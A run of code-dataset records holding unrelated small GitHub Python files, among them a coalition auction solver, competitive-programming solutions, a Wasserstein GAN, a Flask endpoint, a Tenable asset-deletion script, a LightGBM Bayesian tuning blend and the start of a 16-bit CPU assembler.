Fix the tasks if the completion is close\n for i in range(na):\n task_idx = p[i]\n if len(task_idx) == 0:\n agents[\"previous_task\"][i] = 0\n agents[\"previous_winnerBids\"][i] = 0\n else:\n task_idx = task_idx[0]\n if (\n tasks_list[task_idx][\"tloiter\"] > 0\n and (tasks_list[task_idx][\"tf\"] - tasks_list[task_idx][\"tloiter\"])\n / tasks_list[task_idx][\"tloiter\"]\n < 1\n ):\n p[i] = agents[\"previous_task\"][i]\n agents_list[i][\"rin_task\"] = []\n else:\n agents[\"previous_task\"][i] = task_idx\n agents[\"previous_winnerBids\"][i] = S_GCAA_ALL_agents[i]\n\n rin_task = np.zeros((na, nt))\n vin_task = np.zeros((na, nt))\n for i in range(na):\n rin_task[i] = agents_list[i][\"rin_task\"]\n vin_task[i] = agents_list[i][\"vin_task\"]\n\n return (\n p,\n S_GCAA,\n S_GCAA_ALL,\n rt,\n {\n \"Pos\": agents[\"Pos\"],\n \"v_a\": agents[\"v_a\"],\n \"Lt\": agents[\"Lt\"],\n \"previous_task\": agents[\"previous_task\"],\n \"previous_winnerBids\": agents[\"previous_winnerBids\"],\n \"rin_task\": rin_task,\n \"vin_task\": vin_task,\n },\n )\n","repo_name":"Gaochengzhi/MACM","sub_path":"GreedyCoalitionAuctionAlgorithm/GCAASolution.py","file_name":"GCAASolution.py","file_ext":"py","file_size_in_byte":4895,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"39171092214","text":"#18870번 좌표 압축\nif __name__ == \"__main__\":\n n = int(input())\n nums = list(map(int,input().split()))\n result = list(sorted(set(nums))) #set을 통해 중복 제거\n dic = {}\n for i in range(len(result)) : \n dic[result[i]] = i #dictionary를 통해 각 숫자에 매칭되는 출력값 설정\n for i in nums : \n print(dic[i],end = ' ')\n","repo_name":"tomy9729/Algorithm","sub_path":"BaekJoon/Step-by-step troubleshooting(단계별로 문제풀기)/12. 정렬/18870번 좌표 압축.py","file_name":"18870번 좌표 압축.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"19433957037","text":"from typing import List\nfrom collections import deque\n\n\nclass Node:\n def __init__(self, val=None, children=None):\n self.val = val\n self.children = children\n\n\nclass Solution:\n def preorder(self, root: 'Node') -> List[int]:\n if root:\n lst = [root.val]\n if root.children:\n for child in root.children:\n lst.extend(self.preorder(child))\n else:\n return []\n return lst\n\n def preorder_iter(self, root: 'Node') -> List[int]:\n if not root:\n return []\n deq = deque([root])\n\n lst = list()\n while len(deq):\n el = deq.pop()\n lst.append(el.val)\n if el.children is not None:\n deq.extend(el.children[::-1])\n return lst\n","repo_name":"plocinskipiotr/my_leetcode","sub_path":"problems/easy/n_ary_tree_preorder_traversal/n_ary_tree_preorder_traversal.py","file_name":"n_ary_tree_preorder_traversal.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21124907106","text":"import time\r\nfrom flask import Flask, redirect, url_for, render_template, request\r\nfrom flask_cors import CORS\r\n\r\napp = Flask(__name__)\r\nCORS(app)\r\n\r\n@app.route('/result', methods=('GET', 'POST'))\r\ndef get_current_time():\r\n if request.method == 'POST':\r\n data = request.get_json(force=True)\r\n print(data)\r\n return data\r\n else:\r\n return \"hello\"\r\n","repo_name":"Robert-J-Schelling/Black-Scholes-Calculator","sub_path":"Reactjs-Study/blackscholes/api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11809617401","text":"import argparse\nfrom command_modules.create_info_sheet import create_info_sheet\nfrom command_modules.aggregate_grades import aggregate_grades\n\n\ndef fill_team_grades(args):\n grade_file = args.grade_file\n team_file = args.team_file\n return\n\n\nif __name__ == \"__main__\":\n # Create argument parser\n parser = argparse.ArgumentParser(description=\"A utility for EPICS document creation and grading.\")\n subparsers = parser.add_subparsers(description='The main commands for the program', dest='command', required=True)\n\n # fill team grades\n parser_fill_grades = subparsers.add_parser('fill-grades', help='Distribute grades for all members of a team')\n parser_fill_grades.add_argument('--grade-file', required=True)\n parser_fill_grades.add_argument('--team-file', required=True)\n parser_fill_grades.set_defaults(func=fill_team_grades)\n\n # create student info TEX file\n student_info_command = \"team-notes-sheet\"\n parser_student_info = subparsers.add_parser(student_info_command, help='Create tex output for team info files')\n parser_student_info.add_argument('--team-file', default=\"class_data/team_list.csv\")\n parser_student_info.add_argument('--student-info-file', default=\"class_data/eLearning_user_information.csv\")\n parser_student_info.add_argument('--document-title', default=\"EPICS Class List\")\n parser_student_info.add_argument('--output-dir-name', default=\"student_info_doc\")\n parser_student_info.add_argument('--image-location')\n\n # aggregate team grades into TEX file\n aggregate_grades_command = \"aggregate-grades\"\n parser_grade_aggregate = subparsers.add_parser(aggregate_grades_command,\n help='Aggregate grades from assignments by team')\n parser_grade_aggregate.add_argument('--team-file', default=\"class_data/team_list.csv\")\n parser_grade_aggregate.add_argument('--grade-files', default=\"class_data/grade_files\")\n parser_grade_aggregate.add_argument('--document-title', default=\"Mid-Semester Grade Summary\")\n parser_grade_aggregate.add_argument('--output-dir-name', default=\"semester_grade_review\")\n\n # Parse args and run command\n top_args = parser.parse_args()\n if top_args.command == student_info_command:\n create_info_sheet(top_args)\n elif top_args.command == aggregate_grades_command:\n aggregate_grades(top_args)\n else:\n print(\"Function not implemented!\")\n","repo_name":"MStolen/EPICS_Teaching_Utility","sub_path":"EPICS_Util.py","file_name":"EPICS_Util.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38136394628","text":"\"\"\" Implementation of the Wasserstein GAN and improved Wasserstein GAN \"\"\"\n\nimport tensorflow as tf\n\nfrom rivalgan.base_gan import BaseGAN\nfrom rivalgan.net_layers import create_descriminator_layers, create_generator_layers\nfrom rivalgan.utils import xavier_init\n\n\nclass WassersteinGAN(BaseGAN):\n \"\"\" Implementation of the Wasserstein GAN and improved Wasserstein GAN \"\"\"\n\n def __init__(self, gan_configuration):\n self.d_h1, self.d_h2, self.d_h3 = None, None, None\n self.clip_dis = None\n if gan_configuration._name == 'IWGAN':\n self.improved_wgan = True\n super().__init__(gan_configuration)\n\n def generator(self, h1_nodes=500, h2_nodes=500):\n \"\"\" Create generator\n Generator weights/biases\n g_h1: hidden layer 1 weights and biases\n g_h2: hidden layer 2 weights and biases\n g_h3: hidden layer 3 weights and biases\n \"\"\"\n\n g_h1 = {'weights': tf.Variable(xavier_init([self.z_dim, h1_nodes], 'g_w1', tf.float32)),\n 'biases': tf.Variable(tf.zeros(h1_nodes), name='g_b1', dtype=tf.float32)}\n g_h2 = {'weights': tf.Variable(xavier_init([h1_nodes, h2_nodes], 'g_w2', tf.float32)),\n 'biases': tf.Variable(tf.zeros([h2_nodes]), name='g_b2', dtype=tf.float32)}\n g_h3 = {'weights': tf.Variable(xavier_init([h2_nodes, self.X_node], 'g_w3', tf.float32)),\n 'biases': tf.Variable(tf.zeros([self.X_node]), name='g_b3', dtype=tf.float32)}\n\n # Generate fake x's from output layer of generator\n\n self.gen_X = create_generator_layers(self.prior_z, g_h1, g_h2, g_h3, self.keep_prob)\n\n # List of 'var_list' for generator trainer to optimise\n self.gen_params = [g_h1['weights'], g_h1['biases'],\n g_h2['weights'], g_h2['biases'],\n g_h3['weights'], g_h3['biases']]\n\n def discriminator(self, h1_nodes=500, h2_nodes=500):\n \"\"\" Create discriminator\n Discriminator weights/biases\n d_h1: hidden layer 1 weights and biases\n d_h2: hidden layer 2 weights and biases\n d_h3: hidden layer 3 weights and biases\n \"\"\"\n self.d_h1 = {'weights': tf.Variable(xavier_init([self.X_node, h1_nodes], 'd_w1', tf.float32)),\n 'biases': tf.Variable(tf.zeros([h1_nodes]), name='d_b1', dtype=tf.float32)}\n self.d_h2 = {'weights': tf.Variable(xavier_init([h1_nodes, h2_nodes], 'd_w2', tf.float32)),\n 'biases': tf.Variable(tf.zeros([h2_nodes]), name='d_b2', dtype=tf.float32)}\n self.d_h3 = {'weights': tf.Variable(xavier_init([h2_nodes, self.y_node], 'd_w3', tf.float32)),\n 'biases': tf.Variable(tf.zeros([self.y_node]), name='d_b3', dtype=tf.float32)}\n # Output shape has 2 features; Shape: [batch(real) + batch(gen.), 2]\n\n # Real data output\n self.y_data = create_descriminator_layers(self.X, self.d_h1, self.d_h2, self.d_h3) # 'y_data' == D(x)\n\n # Generated data output\n self.gen_y = create_descriminator_layers(self.gen_X, self.d_h1, self.d_h2, self.d_h3) # 'gen_y' == D[G(z)]\n\n ## List of 'var_list' for discriminator trainer to optimise ##\n self.dis_params = [self.d_h1['weights'], self.d_h1['biases'],\n self.d_h2['weights'], self.d_h2['biases'],\n self.d_h3['weights'], self.d_h3['biases']]\n\n if not self.improved_wgan:\n # Clipping of discriminator\n print(\"Clipping discriminator weights\")\n self.clip_dis = [param.assign(tf.clip_by_value(param, -0.05, 0.05)) for param in self.dis_params]\n\n def optimise(self, train_step=0.0001):\n \"\"\" Optimizers for discriminator and generator losses \"\"\"\n\n # Improved GAN (with regularization)\n if self.improved_wgan:\n eps = tf.random_uniform([self.X_node, ], minval=0., maxval=1.)\n X_inter = eps * self.X + (1. - eps) * self.gen_X\n interp = create_descriminator_layers(X_inter, self.d_h1, self.d_h2, self.d_h3) # Interpolation\n grad = tf.gradients(interp, [X_inter])[0]\n grad_norm = tf.sqrt(tf.reduce_sum((grad) ** 2, axis=1))\n lam = 10\n grad_pen = lam * tf.reduce_mean((grad_norm - 1) ** 2)\n\n self.d_loss = tf.reduce_mean(self.y_data) - tf.reduce_mean(self.gen_y) + grad_pen\n self.g_loss = - tf.reduce_mean(self.gen_y)\n\n self.d_trainer = tf.train.GradientDescentOptimizer(learning_rate=train_step).minimize(self.d_loss,\n var_list=self.dis_params)\n self.g_trainer = tf.train.AdamOptimizer(learning_rate=train_step).minimize(self.g_loss,\n var_list=self.gen_params)\n\n\n else:\n self.d_loss = tf.reduce_mean(self.y_data) - tf.reduce_mean(self.gen_y)\n self.g_loss = - tf.reduce_mean(self.gen_y)\n\n # Optimisation Trainers\n self.d_trainer = tf.train.GradientDescentOptimizer(learning_rate=train_step).minimize(self.d_loss,\n var_list=self.dis_params)\n self.g_trainer = tf.train.AdamOptimizer(learning_rate=train_step).minimize(self.g_loss,\n var_list=self.gen_params)\n","repo_name":"ygrepo/RivalGan","sub_path":"rivalgan/wgan.py","file_name":"wgan.py","file_ext":"py","file_size_in_byte":5526,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"18824545602","text":"import argparse\nimport time\n\nparser = None\n\ndef make(): \n print(\"start make \")\n time.sleep(2)\n print(\"end make\")\n\ndef make_install(): \n print(\"start make install \")\n time.sleep(2)\n print(\"end make install\")\n\ndef make_clean():\n print(\"start make clean\")\n time.sleep(2)\n print(\"end make clean\")\n\n\nparser = argparse.ArgumentParser(description='模拟编译操作')\nparser.add_argument('do',type=str,nargs='?' ,help='设置需要做的操作',choices=['install','clean'])\n\nresult = parser.parse_args()\n#print(result)\n\n# 开始根据参数进行判定\n\nif result.do == None: \n make()\nelif result.do == \"install\":\n make_install()\nelif result.do == \"clean\":\n make_clean()\nelse:\n pass","repo_name":"zzjlogin/mydoc","sub_path":"source/demo/argparse/案例的/make.py","file_name":"make.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"32803813798","text":"import pandas as pd\nimport math\nimport json\n# ==========================================================================\n# This file does the secondary data processing step for the data:\n# Objective is to match the columns that involve names of countries to match the standard format in country_coordinates.csv\n\n# ==========================================================================\n##### RAW DATA FORM\n# Loading the data\ndf = pd.read_csv(\"invalid_coordinates_dataframe.csv\")\ncountry_coords = pd.read_csv(\"country_coordinates.csv\")\n\n# ==========================================================================\n##### SECONDARY PROCESSING STEP\n\n# HashMap of wrong country name to correct country names: correctionMap[WRONG_NAME] = CORRECT_NAME\n# correctionsMap[\"\"] = \"\"\ncorrectionsMap = {}\ncorrectionsMap[\"United States of America\"] = \"United States\"\ncorrectionsMap[\"Czech Rep.\"] = \"Czech Republic\"\ncorrectionsMap[\"Russian Federation\"] = \"Russia\"\ncorrectionsMap[\"Serbia and Kosovo: S/RES/1244 (1999)\"] = \"Serbia\"\ncorrectionsMap[\"Viet Nam\"] = \"Vietnam\"\ncorrectionsMap[\"United Kingdom of Great Britain and Northern Ireland\"] = \"United Kingdom\"\ncorrectionsMap[\"Iran (Islamic Rep. of)\"] = \"Iran\"\ncorrectionsMap[\"Palestinian\"] = \"Palestinian Territories\"\ncorrectionsMap[\"Dem. Rep. of the Congo\"] = \"Congo [DRC]\"\ncorrectionsMap[\"Lao People's Dem. Rep.\"] = \"Laos\"\ncorrectionsMap[\"Venezuela (Bolivarian Republic of)\"] = \"Venezuela\"\ncorrectionsMap[\"Syrian Arab Rep.\"] = \"Syria\"\ncorrectionsMap[\"Rep. of Moldova\"] = \"Moldova\"\ncorrectionsMap[\"Bolivia (Plurinational State of)\"] = \"Bolivia\"\ncorrectionsMap[\"China, Hong Kong SAR\"] = \"Hong Kong\"\ncorrectionsMap[\"Dem. People's Rep. of Korea\"] = \"North Korea\"\ncorrectionsMap[\"Dominican Rep.\"] = \"Dominican Republic\"\ncorrectionsMap[\"Myanmar\"] = \"Myanmar [Burma]\"\ncorrectionsMap[\"United Rep. of Tanzania\"] = \"Tanzania\"\ncorrectionsMap[\"The former Yugoslav Rep. of Macedonia\"] = \"Macedonia [FYROM]\"\n\n# Change all wrong countries to correct country names\nfor wrongCountryName in correctionsMap:\n correctCountryName = correctionsMap[wrongCountryName]\n df.loc[df['Origin'] == wrongCountryName, 'Origin'] = correctCountryName\n df.loc[df['Country / territory of asylum/residence'] == wrongCountryName, 'Country / territory of asylum/residence'] = correctCountryName\n\n# Convert coordinates dataframe to dictionary form\ncoords_dict = dict(zip(country_coords.name, zip(country_coords.longitude, country_coords.latitude)))\n\n# Convert country of origin and asylum to geo coordinates\ndf['coor_from'] = df['Origin'].map(coords_dict)\ndf['coor_to'] = df['Country / territory of asylum/residence'].map(coords_dict)\n\n# Save the dataframe\ndf.to_csv('corrected_coordinates_dataframe.csv', index=False)\n","repo_name":"chewterence/MagnaMigratio","sub_path":"data processing/secondary_data_processor.py","file_name":"secondary_data_processor.py","file_ext":"py","file_size_in_byte":2726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17712174110","text":"import sys\nimport struct\n\n__all__ = [ \\\n 'matrix_to_bytes', 'bytes_to_matrix'\n]\n\ndef matrix_to_bytes(matrix, code_size):\n elements = [None] * len(matrix)\n for i, m in enumerate(matrix):\n # elements[i] = struct.pack('=' + 'H' * len(m), *m)\n ms = [int.to_bytes(mm, code_size, sys.byteorder) for mm in m]\n elements[i] = b''.join(ms)\n# print('elements =', elements)\n return b''.join(elements)\n\ndef bytes_to_matrix(bys, element_num, horizontal_size, code_size):\n matrix = [None] * element_num\n for i in range(element_num):\n horizontal_bytes = bys[i*horizontal_size:(i+1)*horizontal_size]\n nums = [None] * element_num\n for j in range(element_num):\n byts = horizontal_bytes[j*code_size:(j+1)*code_size]\n num = int.from_bytes(byts, sys.byteorder)\n nums[j] = num\n matrix[i] = nums\n # print('matrix[{}] = {}'.format(i, matrix[i]))\n return matrix\n","repo_name":"umedoblock/fugou","sub_path":"src/par2/par2/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70944374200","text":"# Check If String Is a Prefix of Array\n#\n# easy\n#\n# Tags:\n#\n# Time: TBD\n# Space: TBD\n#\n# Solution:\n# TBD\n\nfrom typing import List\n\n\ndef isPrefixString(s: str, words: List[str]) -> bool:\n pos = 0\n\n for w in words:\n if not s.startswith(w, pos):\n return False\n\n pos += len(w)\n\n if pos >= len(s):\n return True\n\n return True if pos >= len(s) else False\n\n\nprint(\n isPrefixString(s=\"iloveleetcode\",\n words=[\"i\", \"love\", \"leetcode\", \"apples\"]), True)\nprint(\n isPrefixString(s=\"iloveleetcode\",\n words=[\"i\", \"apples\", \"leetcode\", \"apples\"]), False)\n\nprint(isPrefixString(s=\"ccccccccccc\", words=[\"c\", \"cc\"]), False)\n","repo_name":"d4rkr00t/leetcode-tasks","sub_path":"contest/w253/1-check-if-string-is-a-prefix-of-array.py","file_name":"1-check-if-string-is-a-prefix-of-array.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3585335141","text":"# 2022/10/27 Baek 17404\nimport sys\ninput = sys.stdin.readline\nINF = int(1e9)\n\nn = int(input())\nrgb = []\nfor _ in range(n):\n rgb.append(list(map(int, input().split())))\n\nans = INF\nfor i in range(3):\n dp = [[INF] * 3 for _ in range(n)]\n dp[0][i] = rgb[0][i]\n for j in range(1, n):\n dp[j][0] = rgb[j][0] + min(dp[j - 1][1], dp[j - 1][2])\n dp[j][1] = rgb[j][1] + min(dp[j - 1][0], dp[j - 1][2])\n dp[j][2] = rgb[j][2] + min(dp[j - 1][0], dp[j - 1][1])\n\n for j in range(3):\n if i != j:\n ans = min(ans, dp[-1][j])\n\nprint(ans)\n\n#dp 배열크기를 재선언 하지 않는 효율적인 코드\nimport sys\ninput = sys.stdin.readline\n\nINF = int(1e9)\nN = int(input())\nrgb = []\nfor _ in range(N):\n rgb.append(list(map(int, input().split())))\n\ndp = [[0] * 3 for _ in range(2)]\nans = INF\n\nfor k in range(3):\n dp[0][0], dp[0][1], dp[0][2] = INF, INF, INF\n dp[0][k] = rgb[0][k]\n\n for i in range(1, N):\n dp[1][0] = min(dp[0][1], dp[0][2]) + rgb[i][0]\n dp[1][1] = min(dp[0][0], dp[0][2]) + rgb[i][1]\n dp[1][2] = min(dp[0][0], dp[0][1]) + rgb[i][2]\n\n dp[0][0], dp[0][1], dp[0][2] = dp[1][0], dp[1][1], dp[1][2]\n\n ans = min(ans, dp[0][(k + 1) % 3], dp[0][(k + 2) % 3])\n\nprint(ans)","repo_name":"kkw2758/Algorithm","sub_path":"DP/baek_17404.py","file_name":"baek_17404.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36603777740","text":"import re\nimport json\nimport csv\nfrom collections import OrderedDict\n\n\nclass InfoParser:\n def __init__(self, infoname):\n self.infoname = infoname\n if not re.match(r'.*\\.log\\.csv$', infoname):\n raise Exception(\"Need .log.csv file\")\n\n self.basic_blocks = OrderedDict()\n self.flows = {}\n self.symbols = OrderedDict()\n\n def load(self):\n basic_blocks = {}\n symbols = {}\n\n fcsv = open(self.infoname, 'r')\n inforeader = csv.reader(fcsv, skipinitialspace=True)\n\n for row in inforeader:\n if not len(row): continue\n\n if 'block' == row[0]:\n entry = int(row[1], 0)\n block = {\n 'type': row[0],\n 'entry': entry,\n 'module': int(row[2], 0),\n 'end': int(row[3], 0),\n 'last_pc': int(row[4], 0),\n 'last_asm': row[5]\n }\n basic_blocks[entry] = block\n\n elif 'symbol' == row[0]:\n entry = int(row[1], 0)\n symbol = {\n 'type': 'symbol',\n 'entry': entry,\n 'module': int(row[2], 0),\n 'ordinal': row[3],\n 'name': row[4],\n }\n symbols[entry] = symbol\n\n self.basic_blocks = basic_blocks\n self.symbols = symbols\n\n fcsv.close()\n\n def flow(self):\n flowname = re.sub(r'\\.log\\.csv$', '.log.flow', self.infoname)\n\n fp = open(flowname, 'r')\n flowreader = csv.reader(fp, skipinitialspace=True)\n flows = {}\n\n for row in flowreader:\n target_pc = int(row[0], 0)\n jump_from_pc = int(row[1], 0)\n occurence = int(row[2])\n\n if target_pc not in flows:\n flows[target_pc] = {}\n\n flows[target_pc][jump_from_pc] = occurence\n\n fp.close()\n\n self.flows = flows\n","repo_name":"firodj/bbtrace","sub_path":"plugin/bbtrace/InfoParser.py","file_name":"InfoParser.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"40"} +{"seq_id":"43061612470","text":"import os.path, sys\nsys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir))\nimport tenbIOcore as tc\nimport beautifyResults as br\nimport datetime\n\n# file and directory locations\nkey_file=\"../../io_keys.json\" # location of your key file\nresults_dir=\"../results/\" # the directory for your results\nstyles_dir=\"../styles/\" #style sheet location for web pages\n\n# delete bulk assets by tag\npayload = {\n\t\"query\": {\n\t\"field\": \"tag.4BulkDeletion\",\n\t\"operator\": \"eq\",\n\t\"value\": \"192-168-16\"\n\t},\n\t\"hard_delete\": True\n}\napi_keys=tc.read_keys(key_file,\"sandbox\")\nassets_deleted=tc.delete_bulk_assets(api_keys,payload)\nprint(\"Deleted \"+str(assets_deleted)+\" assets\")\n","repo_name":"jbowler432/tenb-reports","sub_path":"io_examples/delete_bulk_assets.py","file_name":"delete_bulk_assets.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"16096522449","text":"# https://leetcode-cn.com/problems/construct-binary-tree-from-preorder-and-inorder-traversal/submissions/\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def buildTree(self, preorder: List[int], inorder: List[int]) -> TreeNode:\n pre_len, in_len = len(preorder), len(inorder)\n root = self._build_tree(preorder, 0, pre_len - 1, inorder, 0, in_len - 1)\n return root\n\n def _build_tree(self, preorder, pre_left, pre_right,\n inorder, in_left, in_right):\n if pre_left > pre_right or in_left > in_right:\n return None\n\n pivot = preorder[pre_left]\n pivot_index = in_left\n while inorder[pivot_index] != pivot:\n pivot_index += 1\n root = TreeNode(pivot)\n root.left = self._build_tree(preorder, pre_left + 1, pre_left + pivot_index - in_left,\n inorder, in_left, pivot_index - 1)\n\n root.right = self._build_tree(preorder, pre_left + pivot_index - in_left + 1, pre_right,\n inorder, pivot_index + 1, in_right)\n return root\n\n","repo_name":"algorithm004-02/algorithm004-02","sub_path":"Week 02/id_442/LeetCode_105_442.py","file_name":"LeetCode_105_442.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"40"} +{"seq_id":"25611773459","text":"# https://www.kaggle.com/fabiendaniel/hyperparameter-tuning\nimport warnings\n\nimport pandas as pd\nimport numpy as np\n\nimport lightgbm as lgb\n\nfrom pprint import pprint\nfrom bayes_opt import BayesianOptimization, UtilityFunction\n\nfrom cv import run_cv_model\nfrom utils import print_step, rmse\nfrom drops import get_drops, save_drops, add_drops\nfrom cache import load_cache, save_in_cache\n\n\nprint('~~~~~~~~~~~~~~~~~~~~~~~')\nprint_step('Importing Data')\ntrain, test = load_cache('data_with_fe')\n\nprint_step('Subsetting')\ntarget = train['target']\ntrain_id = train['card_id']\ntest_id = test['card_id']\n\nfeatures = [c for c in train.columns if c not in ['card_id', 'first_active_month', 'target']]\nprint(train[features].shape)\nprint(test[features].shape)\n\ndrops = get_drops()\nfeatures_c = [f for f in features if f not in drops]\nprint(train[features_c].shape)\nprint(test[features_c].shape)\n\n\ndef runLGB(train_X, train_y, test_X, test_y, test_X2, params):\n print_step('Prep LGB')\n d_train = lgb.Dataset(train_X, label=train_y)\n d_valid = lgb.Dataset(test_X, label=test_y)\n watchlist = [d_train, d_valid]\n print_step('Train LGB')\n num_rounds = params.pop('num_rounds')\n verbose_eval = params.pop('verbose_eval')\n early_stop = None\n if params.get('early_stop'):\n early_stop = params.pop('early_stop')\n model = lgb.train(params,\n train_set=d_train,\n num_boost_round=num_rounds,\n valid_sets=watchlist,\n verbose_eval=verbose_eval,\n early_stopping_rounds=early_stop)\n print_step('Predict 1/2')\n pred_test_y = model.predict(test_X, num_iteration=model.best_iteration)\n print_step('Predict 2/2')\n pred_test_y2 = model.predict(test_X2, num_iteration=model.best_iteration)\n return pred_test_y, pred_test_y2, model.feature_importance()\n\n\ndef runBayesOpt(num_leaves, bag_fraction, feat_fraction, lambda1, lambda2, min_data):\n print('num_leaves {}, bag_fraction {}, feat_fraction {}, lambda1 {}, lambda2 {}, min_data {}'.format(int(num_leaves), bag_fraction, feat_fraction, lambda1, lambda2, int(min_data)))\n params = {'application': 'regression',\n 'boosting': 'gbdt',\n 'metric': 'rmse',\n 'num_leaves': int(num_leaves),\n 'max_depth': 11,\n 'learning_rate': 0.05,\n 'bagging_fraction': bag_fraction,\n 'feature_fraction': feat_fraction,\n 'lambda_l1': lambda1,\n 'lambda_l2': lambda2,\n 'min_data_in_leaf': int(min_data),\n 'early_stop': 40,\n 'verbose_eval': 20,\n 'verbosity': -1,\n 'data_random_seed': 3,\n 'nthread': 4,\n 'num_rounds': 10000}\n return run_cv_model(train[features_c], test[features_c], target, runLGB, params, rmse, 'lgb')\n\nLGB_BO = BayesianOptimization(runBayesOpt, {\n 'num_leaves': (10, 1200),\n 'bag_fraction': (0.1, 1.0),\n 'feat_fraction': (0.1, 0.9),\n 'lambda1': (1, 400),\n 'lambda2': (1, 400),\n 'min_data': (10, 300)\n})\nprint_step('Baseline')\nresults = runBayesOpt(num_leaves=105,\n bag_fraction=0.95,\n feat_fraction=0.8,\n lambda1=101.3,\n lambda2=120,\n min_data=21)\nprint_step('{}: {}'.format('baseline', results['final_cv']))\nbest_score = results['final_cv']\ncurrent_train_oofs = [results['train']]\ncurrent_test_oofs = [results['test']]\nwith warnings.catch_warnings():\n warnings.filterwarnings('ignore')\n abandon = False\n i = 2\n while i < 21 and not abandon:\n print('-')\n print('-')\n print('-')\n print_step('{}/20'.format(i))\n i += 1\n LGB_BO = BayesianOptimization(runBayesOpt, {\n 'num_leaves': (10, 1200),\n 'bag_fraction': (0.1, 1.0),\n 'feat_fraction': (0.1, 0.9),\n 'lambda1': (1, 400),\n 'lambda2': (1, 400),\n 'min_data': (10, 300)\n })\n utility = UtilityFunction(kind='ucb', kappa=2.5, xi=0.0)\n done = False\n tries = 0\n while not done:\n next_point_to_probe = LGB_BO.suggest(utility)\n results = runBayesOpt(**next_point_to_probe)\n weight = 1 / i\n score = rmse(target, (1 - weight) * np.mean(np.array(current_train_oofs), axis=0) + weight * results['train'])\n if score < best_score:\n done = True\n current_train_oofs.append(results['train'])\n current_test_oofs.append(results['test'])\n best_score = score\n else:\n tries += 1\n if tries > 20:\n print_step('20 tries exceeded... abandoning')\n done = True\n abandon = True\n LGB_BO.register(params=next_point_to_probe, target=-score)\n print_step('{}: Local {} - Global {} - Best {}'.format(next_point_to_probe, results['final_cv'], score, best_score))\n print('-')\n\nimport pdb\npdb.set_trace()\n\nrmse(target, np.mean([o for o in current_train_oofs], axis=0))\npd.DataFrame(np.corrcoef(current_train_oofs))\n[rmse(target, o) for o in current_train_oofs]\n[rmse(target, np.mean(current_train_oofs[:i], axis=0)) for i in np.array(range(len(current_train_oofs)))[1:]]\n\nsubmission = pd.DataFrame()\nsubmission['card_id'] = test_id\nsubmission['target'] = np.mean(current_test_oofs, axis=0)\nsubmission.to_csv('submit/submit_bayes_blend.csv', index=False)\n","repo_name":"peterhurford/kaggle-elo","sub_path":"bayes_forest.py","file_name":"bayes_forest.py","file_ext":"py","file_size_in_byte":5564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8261765647","text":"\"\"\"\r\nAssembler for the 16-bit Manas-CPU\r\n - Highest value of instruction argument is 11-bits, 5 bits for instruction code, so 0x7FF.\r\n - Provide .manas assembly file name or path.\r\n - Can also include output file name or path as third argument, \r\n however this is optional, it will default to \"output.manasbin\".\r\n\r\nFunctions:\r\n - strToInt(number:str) -> int\r\n - ReadInstructions(file: str) -> list[list]\r\n - Assemble(instructionList: list[list], outfile: str) -> None\r\n - run() -> None\r\n\r\nConstants:\r\n - PRG_END\r\n\r\nDictionaries:\r\n - Instruction_codes -> Contains all the instruction opcodes for the assembly instructions.\r\n\"\"\"\r\n\"\"\"\r\nCopyright (C) 2023 David Jøssang\r\n\r\nThis program is free software: you can redistribute it and/or modify\r\nit under the terms of the GNU General Public License as published by\r\nthe Free Software Foundation, either version 3 of the License, or\r\n(at your option) any later version.\r\n\r\nThis program is distributed in the hope that it will be useful,\r\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\r\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\nGNU General Public License for more details.\r\n\r\nYou should have received a copy of the GNU General Public License\r\nalong with this program. If not, see <https://www.gnu.org/licenses/>.\r\n\"\"\"\r\n\r\nimport sys\r\n\r\n#Explanations are in the microassembler\r\nPRG_END = 0b1111100000000000\r\nInstruction_codes = {\r\n \"LDA\": 0b0000100000000000,\r\n \"LDB\": 0b0001000000000000,\r\n \"LDC\": 0b0001100000000000,\r\n \"LDIA\": 0b0010000000000000,\r\n \"LDIB\": 0b0010100000000000,\r\n \"LDIC\": 0b0011000000000000,\r\n \"STA\": 0b0011100000000000,\r\n \"STB\": 0b0100000000000000,\r\n \"STC\": 0b0100100000000000,\r\n\r\n \"ADD\": 0b0101000000000000,\r\n \"SUB\": 0b0101100000000000,\r\n \"MULT\": 0b0110000000000000,\r\n \"SHL\": 0b0110100000000000,\r\n \"SHR\": 0b0111000000000000,\r\n\r\n \"JMP\": 0b0111100000000000,\r\n \"JMPZ\": 